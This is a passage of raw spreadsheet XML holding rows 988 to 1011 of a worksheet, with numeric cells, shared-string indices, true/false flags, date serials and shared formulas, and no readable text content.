      </c>
      <c r="R988" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S988" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="1">
        <v>12832.0</v>
      </c>
      <c r="B989" s="2" t="s">
        <v>4297</v>
      </c>
      <c r="C989" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D989" s="6" t="s">
        <v>4298</v>
      </c>
      <c r="E989" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F989" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G989" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H989" s="4">
        <v>43473.07430555556</v>
      </c>
      <c r="I989" s="1" t="s">
        <v>3954</v>
      </c>
      <c r="J989" s="1" t="s">
        <v>4299</v>
      </c>
      <c r="K989" s="2" t="s">
        <v>4300</v>
      </c>
      <c r="L989" s="1">
        <v>1.0</v>
      </c>
      <c r="M989" s="1">
        <v>1.0</v>
      </c>
      <c r="N989" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O989" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P989" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q989" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R989" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S989" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="1">
        <v>12835.0</v>
      </c>
      <c r="B990" s="2" t="s">
        <v>4301</v>
      </c>
      <c r="C990" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D990" s="2" t="s">
        <v>4302</v>
      </c>
      <c r="E990" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F990" s="1" t="s">
        <v>694</v>
      </c>
      <c r="G990" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H990" s="4">
        <v>44262.84097222222</v>
      </c>
      <c r="I990" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J990" s="1" t="s">
        <v>4303</v>
      </c>
      <c r="K990" s="2" t="s">
        <v>4304</v>
      </c>
      <c r="L990" s="1">
        <v>1.0</v>
      </c>
      <c r="M990" s="1">
        <v>1.0</v>
      </c>
      <c r="N990" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O990" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P990" s="1" t="s">
        <v>4305</v>
      </c>
      <c r="Q990" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R990" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S990" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="1">
        <v>12836.0</v>
      </c>
      <c r="B991" s="2" t="s">
        <v>4306</v>
      </c>
      <c r="C991" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D991" s="2" t="s">
        <v>4307</v>
      </c>
      <c r="E991" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F991" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G991" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H991" s="4">
        <v>44843.82013888889</v>
      </c>
      <c r="I991" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J991" s="1" t="s">
        <v>4308</v>
      </c>
      <c r="K991" s="2" t="s">
        <v>4309</v>
      </c>
      <c r="L991" s="1">
        <v>3.0</v>
      </c>
      <c r="M991" s="1">
        <v>7.0</v>
      </c>
      <c r="N991" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O991" s="1" t="s">
        <v>4310</v>
      </c>
      <c r="P991" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q991" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R991" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S991" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="1">
        <v>12908.0</v>
      </c>
      <c r="B992" s="2" t="s">
        <v>4311</v>
      </c>
      <c r="C992" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D992" s="2" t="s">
        <v>4312</v>
      </c>
      <c r="E992" s="2" t="s">
        <v>1401</v>
      </c>
      <c r="F992" s="1" t="s">
        <v>4313</v>
      </c>
      <c r="G992" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H992" s="1" t="s">
        <v>4314</v>
      </c>
      <c r="I992" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J992" s="1" t="s">
        <v>4315</v>
      </c>
      <c r="K992" s="2" t="s">
        <v>4316</v>
      </c>
      <c r="L992" s="1">
        <v>3.0</v>
      </c>
      <c r="M992" s="1">
        <v>4.0</v>
      </c>
      <c r="N992" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O992" s="1" t="s">
        <v>4317</v>
      </c>
      <c r="P992" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q992" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R992" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S992" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="1">
        <v>12909.0</v>
      </c>
      <c r="B993" s="2" t="s">
        <v>4318</v>
      </c>
      <c r="C993" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D993" s="2" t="s">
        <v>4312</v>
      </c>
      <c r="E993" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F993" s="1" t="s">
        <v>4319</v>
      </c>
      <c r="G993" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H993" s="1" t="s">
        <v>4320</v>
      </c>
      <c r="I993" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J993" s="1" t="s">
        <v>4315</v>
      </c>
      <c r="K993" s="2" t="s">
        <v>4316</v>
      </c>
      <c r="L993" s="1">
        <v>3.0</v>
      </c>
      <c r="M993" s="1">
        <v>4.0</v>
      </c>
      <c r="N993" s="1" t="s">
        <v>1776</v>
      </c>
      <c r="O993" s="1" t="s">
        <v>4317</v>
      </c>
      <c r="P993" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q993" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R993" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S993" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="1">
        <v>12912.0</v>
      </c>
      <c r="B994" s="2" t="s">
        <v>4321</v>
      </c>
      <c r="C994" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D994" s="2" t="s">
        <v>4322</v>
      </c>
      <c r="E994" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F994" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G994" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H994" s="4">
        <v>44782.211805555555</v>
      </c>
      <c r="I994" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J994" s="1" t="s">
        <v>4323</v>
      </c>
      <c r="K994" s="2" t="s">
        <v>4324</v>
      </c>
      <c r="L994" s="1">
        <v>2.0</v>
      </c>
      <c r="M994" s="1">
        <v>3.0</v>
      </c>
      <c r="N994" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O994" s="1" t="s">
        <v>4325</v>
      </c>
      <c r="P994" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q994" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R994" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S994" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="1">
        <v>12915.0</v>
      </c>
      <c r="B995" s="2" t="s">
        <v>4326</v>
      </c>
      <c r="C995" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D995" s="2" t="s">
        <v>4327</v>
      </c>
      <c r="E995" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F995" s="1" t="s">
        <v>3923</v>
      </c>
      <c r="G995" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H995" s="4">
        <v>44808.83541666667</v>
      </c>
      <c r="I995" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J995" s="1" t="s">
        <v>4328</v>
      </c>
      <c r="K995" s="2" t="s">
        <v>4329</v>
      </c>
      <c r="L995" s="1">
        <v>1.0</v>
      </c>
      <c r="M995" s="1">
        <v>1.0</v>
      </c>
      <c r="N995" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O995" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P995" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q995" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R995" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S995" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="1">
        <v>12916.0</v>
      </c>
      <c r="B996" s="2" t="s">
        <v>4330</v>
      </c>
      <c r="C996" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D996" s="2" t="s">
        <v>4331</v>
      </c>
      <c r="E996" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F996" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G996" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H996" s="1" t="s">
        <v>4332</v>
      </c>
      <c r="I996" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J996" s="1" t="s">
        <v>4333</v>
      </c>
      <c r="K996" s="2" t="s">
        <v>4334</v>
      </c>
      <c r="L996" s="1">
        <v>1.0</v>
      </c>
      <c r="M996" s="1">
        <v>1.0</v>
      </c>
      <c r="N996" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O996" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P996" s="1" t="s">
        <v>4335</v>
      </c>
      <c r="Q996" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R996" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S996" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="1">
        <v>12921.0</v>
      </c>
      <c r="B997" s="2" t="s">
        <v>4336</v>
      </c>
      <c r="C997" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D997" s="2" t="s">
        <v>4337</v>
      </c>
      <c r="E997" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F997" s="1" t="s">
        <v>4338</v>
      </c>
      <c r="G997" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H997" s="1" t="s">
        <v>4339</v>
      </c>
      <c r="I997" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J997" s="1" t="s">
        <v>4340</v>
      </c>
      <c r="K997" s="2" t="s">
        <v>4341</v>
      </c>
      <c r="L997" s="1">
        <v>6.0</v>
      </c>
      <c r="M997" s="1">
        <v>11.0</v>
      </c>
      <c r="N997" s="1" t="s">
        <v>4342</v>
      </c>
      <c r="O997" s="1" t="s">
        <v>4343</v>
      </c>
      <c r="P997" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q997" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R997" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S997" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="1">
        <v>12931.0</v>
      </c>
      <c r="B998" s="2" t="s">
        <v>4344</v>
      </c>
      <c r="C998" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D998" s="2" t="s">
        <v>4345</v>
      </c>
      <c r="E998" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F998" s="1" t="s">
        <v>1187</v>
      </c>
      <c r="G998" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H998" s="4">
        <v>43891.475694444445</v>
      </c>
      <c r="I998" s="1" t="s">
        <v>1189</v>
      </c>
      <c r="J998" s="1" t="s">
        <v>4346</v>
      </c>
      <c r="K998" s="2" t="s">
        <v>4347</v>
      </c>
      <c r="L998" s="1">
        <v>3.0</v>
      </c>
      <c r="M998" s="1">
        <v>3.0</v>
      </c>
      <c r="N998" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O998" s="1" t="s">
        <v>4348</v>
      </c>
      <c r="P998" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q998" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R998" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S998" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="1">
        <v>12932.0</v>
      </c>
      <c r="B999" s="2" t="s">
        <v>4349</v>
      </c>
      <c r="C999" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D999" s="2" t="s">
        <v>4345</v>
      </c>
      <c r="E999" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F999" s="1" t="s">
        <v>4350</v>
      </c>
      <c r="G999" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H999" s="4">
        <v>43891.96666666667</v>
      </c>
      <c r="I999" s="1" t="s">
        <v>1189</v>
      </c>
      <c r="J999" s="1" t="s">
        <v>4346</v>
      </c>
      <c r="K999" s="2" t="s">
        <v>4347</v>
      </c>
      <c r="L999" s="1">
        <v>3.0</v>
      </c>
      <c r="M999" s="1">
        <v>3.0</v>
      </c>
      <c r="N999" s="1" t="s">
        <v>4351</v>
      </c>
      <c r="O999" s="1" t="s">
        <v>4348</v>
      </c>
      <c r="P999" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q999" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R999" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S999" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="1">
        <v>12933.0</v>
      </c>
      <c r="B1000" s="2" t="s">
        <v>4352</v>
      </c>
      <c r="C1000" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1000" s="2" t="s">
        <v>4345</v>
      </c>
      <c r="E1000" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F1000" s="1" t="s">
        <v>4353</v>
      </c>
      <c r="G1000" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1000" s="4">
        <v>43922.541666666664</v>
      </c>
      <c r="I1000" s="1" t="s">
        <v>1189</v>
      </c>
      <c r="J1000" s="1" t="s">
        <v>4346</v>
      </c>
      <c r="K1000" s="2" t="s">
        <v>4347</v>
      </c>
      <c r="L1000" s="1">
        <v>3.0</v>
      </c>
      <c r="M1000" s="1">
        <v>3.0</v>
      </c>
      <c r="N1000" s="1" t="s">
        <v>4354</v>
      </c>
      <c r="O1000" s="1" t="s">
        <v>4348</v>
      </c>
      <c r="P1000" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1000" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1000" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1000" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="1">
        <v>12950.0</v>
      </c>
      <c r="B1001" s="2" t="s">
        <v>4355</v>
      </c>
      <c r="C1001" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1001" s="2" t="s">
        <v>4356</v>
      </c>
      <c r="E1001" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1001" s="1" t="s">
        <v>993</v>
      </c>
      <c r="G1001" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1001" s="1" t="s">
        <v>4357</v>
      </c>
      <c r="I1001" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1001" s="1" t="s">
        <v>4358</v>
      </c>
      <c r="K1001" s="2" t="s">
        <v>4359</v>
      </c>
      <c r="L1001" s="1">
        <v>3.0</v>
      </c>
      <c r="M1001" s="1">
        <v>4.0</v>
      </c>
      <c r="N1001" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1001" s="1" t="s">
        <v>4360</v>
      </c>
      <c r="P1001" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1001" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1001" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1001" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="1">
        <v>12951.0</v>
      </c>
      <c r="B1002" s="2" t="s">
        <v>4361</v>
      </c>
      <c r="C1002" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1002" s="2" t="s">
        <v>4356</v>
      </c>
      <c r="E1002" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1002" s="1" t="s">
        <v>4362</v>
      </c>
      <c r="G1002" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1002" s="1" t="s">
        <v>4363</v>
      </c>
      <c r="I1002" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1002" s="1" t="s">
        <v>4358</v>
      </c>
      <c r="K1002" s="2" t="s">
        <v>4359</v>
      </c>
      <c r="L1002" s="1">
        <v>3.0</v>
      </c>
      <c r="M1002" s="1">
        <v>4.0</v>
      </c>
      <c r="N1002" s="1" t="s">
        <v>2968</v>
      </c>
      <c r="O1002" s="1" t="s">
        <v>4360</v>
      </c>
      <c r="P1002" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1002" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1002" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1002" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="1">
        <v>12952.0</v>
      </c>
      <c r="B1003" s="2" t="s">
        <v>4364</v>
      </c>
      <c r="C1003" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1003" s="2" t="s">
        <v>4356</v>
      </c>
      <c r="E1003" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F1003" s="1" t="s">
        <v>4365</v>
      </c>
      <c r="G1003" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1003" s="1" t="s">
        <v>4366</v>
      </c>
      <c r="I1003" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1003" s="1" t="s">
        <v>4358</v>
      </c>
      <c r="K1003" s="2" t="s">
        <v>4359</v>
      </c>
      <c r="L1003" s="1">
        <v>3.0</v>
      </c>
      <c r="M1003" s="1">
        <v>4.0</v>
      </c>
      <c r="N1003" s="1" t="s">
        <v>4367</v>
      </c>
      <c r="O1003" s="1" t="s">
        <v>4360</v>
      </c>
      <c r="P1003" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1003" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1003" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1003" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="1">
        <v>12953.0</v>
      </c>
      <c r="B1004" s="2" t="s">
        <v>4368</v>
      </c>
      <c r="C1004" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1004" s="2" t="s">
        <v>4356</v>
      </c>
      <c r="E1004" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F1004" s="1" t="s">
        <v>993</v>
      </c>
      <c r="G1004" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1004" s="1" t="s">
        <v>4369</v>
      </c>
      <c r="I1004" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1004" s="1" t="s">
        <v>4358</v>
      </c>
      <c r="K1004" s="2" t="s">
        <v>4359</v>
      </c>
      <c r="L1004" s="1">
        <v>3.0</v>
      </c>
      <c r="M1004" s="1">
        <v>4.0</v>
      </c>
      <c r="N1004" s="1" t="s">
        <v>2968</v>
      </c>
      <c r="O1004" s="1" t="s">
        <v>4360</v>
      </c>
      <c r="P1004" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1004" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1004" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1004" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="1">
        <v>13059.0</v>
      </c>
      <c r="B1005" s="2" t="s">
        <v>4370</v>
      </c>
      <c r="C1005" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1005" s="2" t="s">
        <v>4371</v>
      </c>
      <c r="E1005" s="2" t="s">
        <v>2547</v>
      </c>
      <c r="F1005" s="1" t="s">
        <v>4372</v>
      </c>
      <c r="G1005" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1005" s="1" t="s">
        <v>4373</v>
      </c>
      <c r="I1005" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1005" s="1" t="s">
        <v>4374</v>
      </c>
      <c r="K1005" s="2" t="s">
        <v>4375</v>
      </c>
      <c r="L1005" s="1">
        <v>3.0</v>
      </c>
      <c r="M1005" s="1">
        <v>4.0</v>
      </c>
      <c r="N1005" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1005" s="1" t="s">
        <v>4376</v>
      </c>
      <c r="P1005" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1005" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1005" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S1005" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="1">
        <v>13060.0</v>
      </c>
      <c r="B1006" s="2" t="s">
        <v>4377</v>
      </c>
      <c r="C1006" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1006" s="2" t="s">
        <v>4371</v>
      </c>
      <c r="E1006" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F1006" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="G1006" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1006" s="1" t="s">
        <v>4378</v>
      </c>
      <c r="I1006" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1006" s="1" t="s">
        <v>4374</v>
      </c>
      <c r="K1006" s="2" t="s">
        <v>4375</v>
      </c>
      <c r="L1006" s="1">
        <v>3.0</v>
      </c>
      <c r="M1006" s="1">
        <v>4.0</v>
      </c>
      <c r="N1006" s="1" t="s">
        <v>4379</v>
      </c>
      <c r="O1006" s="1" t="s">
        <v>4376</v>
      </c>
      <c r="P1006" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1006" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1006" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1006" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="1">
        <v>13274.0</v>
      </c>
      <c r="B1007" s="2" t="s">
        <v>4380</v>
      </c>
      <c r="C1007" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1007" s="2" t="s">
        <v>4381</v>
      </c>
      <c r="E1007" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F1007" s="1" t="s">
        <v>1573</v>
      </c>
      <c r="G1007" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1007" s="1" t="s">
        <v>4382</v>
      </c>
      <c r="I1007" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J1007" s="1" t="s">
        <v>4383</v>
      </c>
      <c r="K1007" s="2" t="s">
        <v>4384</v>
      </c>
      <c r="L1007" s="1">
        <v>1.0</v>
      </c>
      <c r="M1007" s="1">
        <v>1.0</v>
      </c>
      <c r="N1007" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1007" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1007" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1007" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1007" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1007" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="1">
        <v>13515.0</v>
      </c>
      <c r="B1008" s="2" t="s">
        <v>4385</v>
      </c>
      <c r="C1008" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1008" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1008" s="2" t="s">
        <v>2241</v>
      </c>
      <c r="F1008" s="1" t="s">
        <v>4387</v>
      </c>
      <c r="G1008" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1008" s="1" t="s">
        <v>4388</v>
      </c>
      <c r="I1008" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1008" s="1" t="s">
        <v>4389</v>
      </c>
      <c r="K1008" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1008" s="1">
        <v>4.0</v>
      </c>
      <c r="M1008" s="1">
        <v>7.0</v>
      </c>
      <c r="N1008" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1008" s="1" t="s">
        <v>4391</v>
      </c>
      <c r="P1008" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1008" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1008" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1008" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="1">
        <v>13516.0</v>
      </c>
      <c r="B1009" s="2" t="s">
        <v>4385</v>
      </c>
      <c r="C1009" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1009" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1009" s="2" t="s">
        <v>2241</v>
      </c>
      <c r="F1009" s="1" t="s">
        <v>4387</v>
      </c>
      <c r="G1009" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1009" s="1" t="s">
        <v>4392</v>
      </c>
      <c r="I1009" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1009" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1009" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1009" s="1">
        <v>12.0</v>
      </c>
      <c r="M1009" s="1">
        <v>27.0</v>
      </c>
      <c r="N1009" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1009" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1009" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1009" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1009" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1009" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="1">
        <v>13517.0</v>
      </c>
      <c r="B1010" s="2" t="s">
        <v>4395</v>
      </c>
      <c r="C1010" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1010" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1010" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1010" s="1" t="s">
        <v>3781</v>
      </c>
      <c r="G1010" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1010" s="1" t="s">
        <v>4396</v>
      </c>
      <c r="I1010" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1010" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1010" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1010" s="1">
        <v>12.0</v>
      </c>
      <c r="M1010" s="1">
        <v>27.0</v>
      </c>
      <c r="N1010" s="1" t="s">
        <v>199</v>
      </c>
      <c r="O1010" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1010" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1010" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1010" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1010" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="1">
        <v>13518.0</v>
      </c>
      <c r="B1011" s="2" t="s">
        <v>4397</v>
      </c>
      <c r="C1011" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1011" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1011" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1011" s="1" t="s">
        <v>4387</v>
      </c>
      <c r="G1011" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1011" s="1" t="s">
        <v>4398</v>
      </c>
      <c r="I1011" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1011" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1011" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1011" s="1">
        <v>12.0</v>
      </c>
      <c r="M1011" s="1">
        <v>27.0</v>
      </c>
      <c r="N1011" s="1" t="s">
        <v>317</v>
      </c>
      <c r="O1011" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1011" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1011" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1011" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1011" s="1">
